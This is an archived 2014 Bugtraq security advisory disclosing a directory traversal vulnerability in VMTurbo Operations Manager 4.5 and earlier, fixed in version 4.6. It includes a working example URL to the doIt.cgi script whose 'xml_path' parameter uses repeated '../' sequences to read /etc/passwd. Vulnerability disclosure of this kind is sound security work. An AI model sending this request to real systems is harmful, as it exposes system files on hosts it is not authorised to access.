| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201405081438.s48EcF4H009882@sf01web2.securityfocus.com> Date: Thu, 8 May 2014 14:38:15 GMT From: jpecou@...il.com To: bugtraq@...urityfocus.com Subject: Directory Traversal Vulnerability in VMTurbo Operations Manager 4.5 or earlier Product: VM Turbo Operations Manager Vendor: VM Turbo Vulnerable Version(s): 4.5.x earlier Tested Version: 4.0 Advisory Publication: April 11, 2014 Vendor Notification: April 11, 2014 Public Disclosure: May 8, 2014 Vulnerability Type: Directory Traversal Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ ) ------------------------------------------------------------------------ ----------------------- Advisory Details: A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file. The following exploitation example displays the contents of /etc/passwd http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd ------------------------------------------------------------------------ ----------------------- Solution: The vendor has released a fix for this vulnerability in version 4.6. References: [1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement
Powered by blists - more mailing lists